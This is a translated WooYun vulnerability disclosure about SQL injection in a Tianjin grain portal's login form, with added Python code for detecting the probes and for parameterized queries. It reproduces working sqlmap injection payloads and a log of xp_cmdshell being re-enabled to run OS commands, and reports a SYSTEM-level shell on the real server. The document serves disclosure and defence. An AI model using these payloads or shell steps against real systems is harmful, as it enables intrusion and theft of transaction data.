
Vulnerability summary

Defect ID: wooyun-2015-0112978

Title: SQL injection in a Tianjin industry portal site allows getshell and could leak a huge volume of transaction data

Vendor: 津粮网

Author: Hckmaple

Submitted: 2015-05-20 15:50

Fixed: 2015-07-09 11:28

Published: 2015-07-09 11:28

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-20: Details sent to the vendor, awaiting vendor handling
2015-05-25: Vendor confirmed; details disclosed to the vendor only
2015-06-04: Details disclosed to core white hats and domain experts
2015-06-14: Details disclosed to regular white hats
2015-06-24: Details disclosed to intern white hats
2015-07-09: Details disclosed to the public

Brief description:

SQL injection. Also, an invite code would be appreciated.

Detailed description:

Vulnerable URL: http://tjgrain.com/userlogin.asp
The name parameter is SQL-injectable. For a site with PR5, such an obvious hole really shouldn't exist...
Ran sqlmap against it; the results are in the screenshots below.

[Screenshot: QQ截图20150508085402.png]

[Screenshot: QQ截图20150508085758.png]

[Screenshot: QQ截图20150508090756.png]

18 databases

[Screenshot: QQ截图20150508090838.png]

Picked a database at random; it holds dozens of tables. Since this site is a grain and edible-oil trading portal, all the related trade data sits in these databases.

[Screenshot: QQ截图20150508090939.png]

[Screenshot: QQ截图20150508095604.png]

Wrote a shell in; it turned out to be running as SYSTEM, so the server is owned.

[Screenshot: QQ截图20150508100426.png]

[Screenshot: QQ截图20150508231319.png]

The database is too big and the connection too slow, so I didn't dump it.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: name
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: job=login&name=' AND 5032=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(114)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (5032=5032) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(101)+CHAR(121)+CHAR(58))) AND 'YrDi'='YrDi&pass=&submit=进 入

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 to 10 columns
    Payload: job=login&name=' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(114)+CHAR(104)+CHAR(58)+CHAR(69)+CHAR(109)+CHAR(88)+CHAR(103)+CHAR(73)+CHAR(86)+CHAR(88)+CHAR(88)+CHAR(87)+CHAR(82)+CHAR(58)+CHAR(109)+CHAR(101)+CHAR(121)+CHAR(58), NULL, NULL, NULL, NULL, NULL-- AND 'rnET'='rnET&pass=&submit=进 入

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: job=login&name='; WAITFOR DELAY '0:0:5';-- AND 'xBwX'='xBwX&pass=&submit=进 入

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: job=login&name=' WAITFOR DELAY '0:0:5'-- AND 'UyAy'='UyAy&pass=&submit=进 入
---
do you want to exploit this SQL injection? [Y/n]
[10:47:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[10:47:51] [INFO] testing if current user is DBA
[10:47:51] [INFO] read from file 'C:\Python27\sqlmap\output\tjgrain.com\session': 1
[10:47:51] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[10:47:51] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] y
[10:48:05] [INFO] xp_cmdshell re-enabled successfully
[10:48:06] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[10:48:06] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> net user
do you want to retrieve the command standard output? [Y/n/a]
[10:48:15] [INFO] the SQL query used returns 1 entries
command standard output:
---
\\ 的用户帐户
-------------------------------------------------------------------------------
admin                    ASPNET                   Guest
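The sqlmap output above shows four probe types against the name field (error-based CONVERT, UNION, stacked queries, WAITFOR DELAY). The following is an added example, not part of the report and not the site's code, of how a defender could flag such probes in the POST bodies sent to the login form (for instance in a WAF rule or in application-side request logging). The form field names (job, name, pass, submit) come from the report; the sample bodies are constructed here from the reported payloads, with the long CHAR() chains abridged, and the indicator labels are my own.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns derived from the four probe types in the report's sqlmap
# output. These are detection heuristics for one login form, not a complete
# SQL injection signature set.
PROBE_PATTERNS = {
    "error-based (CONVERT)": re.compile(r"\bCONVERT\s*\(\s*INT\b", re.I),
    "union-based": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based (WAITFOR)": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "stacked query": re.compile(r";\s*(?:WAITFOR|SELECT|EXEC|DECLARE)\b", re.I),
    "comment terminator": re.compile(r"--"),
}


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into a dict.

    Splitting on '&' by hand (instead of urllib.parse.parse_qs) keeps a ';'
    inside a value intact whatever the Python version's separator rules are,
    which matters for the stacked-query probe.
    """
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def classify_login_request(body):
    """Return (severity, indicators) for one POST body to the login form.

    "strong": a SQL keyword probe matched (block or alert).
    "weak":   only a single quote was seen; a legitimate name like O'Brien
              trips this, so it is worth logging but not blocking on alone.
    "none":   nothing suspicious.
    Note that sqlmap's probes balance their quotes (each payload above ends
    with a value the application's own closing quote completes), so a
    quote-parity check alone would miss every one of them.
    """
    name = parse_form(body).get("name", "")
    hits = [label for label, pattern in PROBE_PATTERNS.items() if pattern.search(name)]
    severity = "strong" if hits else "none"
    if "'" in name:
        hits.append("quote character")
        if severity == "none":
            severity = "weak"
    return severity, hits


# Constructed sample bodies: one benign login plus the four probes from the
# report (CHAR() chains abridged; submit is the URL-encoded "进 入").
SAMPLE_BODIES = {
    "benign": "job=login&name=zhangsan&pass=hunter2&submit=%E8%BF%9B+%E5%85%A5",
    "error-based": ("job=login&name=' AND 5032=CONVERT(INT,(CHAR(58)+CHAR(98)"
                    "+(SELECT (CASE WHEN (5032=5032) THEN CHAR(49) ELSE CHAR(48) END))"
                    "+CHAR(58))) AND 'YrDi'='YrDi&pass=&submit=%E8%BF%9B+%E5%85%A5"),
    "union": ("job=login&name=' UNION ALL SELECT NULL, NULL, NULL, NULL, "
              "CHAR(58)+CHAR(98)+CHAR(58), NULL, NULL, NULL, NULL, NULL-- AND "
              "'rnET'='rnET&pass=&submit=%E8%BF%9B+%E5%85%A5"),
    "stacked": ("job=login&name='; WAITFOR DELAY '0:0:5';-- AND 'xBwX'='xBwX"
                "&pass=&submit=%E8%BF%9B+%E5%85%A5"),
    "time-based": ("job=login&name=' WAITFOR DELAY '0:0:5'-- AND 'UyAy'='UyAy"
                   "&pass=&submit=%E8%BF%9B+%E5%85%A5"),
}


def scan_samples():
    """Classify every sample body; returns {label: (severity, indicators)}."""
    return {label: classify_login_request(body) for label, body in SAMPLE_BODIES.items()}


if __name__ == "__main__":
    for label, (severity, hits) in scan_samples().items():
        print(f"{label:12s} {severity:6s} {', '.join(hits) or '-'}")
```

Every one of the reported probes lands in the "strong" bucket on a keyword match, while a name containing only an apostrophe is "weak". Because sqlmap balances its quotes, the quote check is there for manual review, not as the primary signal.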

Proof of vulnerability: (the same screenshots as in the detailed description above)


Fix recommendation:

Filter the input.
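The report's one-word fix is input filtering; the durable fix for this class of bug is to stop building the login query by string concatenation and bind the form fields as parameters instead. The following added example (not the site's code, which the sqlmap output identifies as ASP on Microsoft SQL Server 2000; an in-memory SQLite table stands in for the login table here) puts the concatenated query next to the parameterized one and runs both against probe inputs shaped like the report's UNION and error-based payloads. The table name, columns, account and the 'brh' marker are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the portal's login table (one account)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'secret')")
    return conn


def vulnerable_login(conn, name, password):
    """Login check built by string concatenation, the pattern behind the report.

    Returns ("ok", matched_name_or_None) or ("error", message). An "error"
    result means the database tried to parse the user's input as SQL, which
    is exactly what an error-based probe relies on; a name that is not in the
    table means a UNION probe appended rows of its own.
    """
    sql = ("SELECT name FROM users WHERE name = '" + name
           + "' AND pass = '" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return ("error", str(exc))
    return ("ok", row[0] if row else None)


def safe_login(conn, name, password):
    """Same check with bound parameters: the input is always data, never SQL."""
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND pass = ?", (name, password)
    ).fetchone()
    return ("ok", row[0] if row else None)


# Probe inputs shaped like the report's sqlmap payloads (abridged; the marker
# 'brh' stands in for the CHAR() chain sqlmap embeds to recognise its output).
UNION_PROBE = "' UNION ALL SELECT 'brh'--"
ERROR_PROBE = "' AND 5032=CONVERT(INT,(SELECT 'brh')) AND 'YrDi'='YrDi"


def compare(name, password):
    """Run both implementations on the same input; returns (vulnerable, safe)."""
    return (vulnerable_login(make_db(), name, password),
            safe_login(make_db(), name, password))


if __name__ == "__main__":
    print("legit", compare("admin", "secret"))
    print("union", compare(UNION_PROBE, ""))   # concatenated query returns 'brh'
    print("error", compare(ERROR_PROBE, ""))   # concatenated query hits a DB error
```

With concatenation the UNION probe yields a row the table never contained and the CONVERT probe reaches the SQL parser (SQLite reports an unknown function where SQL Server would raise the conversion error sqlmap reads); with bound parameters both probes are just usernames that match nothing. Parameterization closes the injection itself; separately, the report shows the application's database login was able to re-enable xp_cmdshell and land a SYSTEM shell, which a least-privilege database account (no sysadmin role) would have limited even before the query was fixed.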

Copyright notice: please credit Hckmaple@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-05-25 11:27

Vendor reply:

CNVD confirms the described situation; it has been forwarded via CNCERT to the Tianjin branch centre, which will coordinate handling with the site's operating organisation.

Latest status:

None yet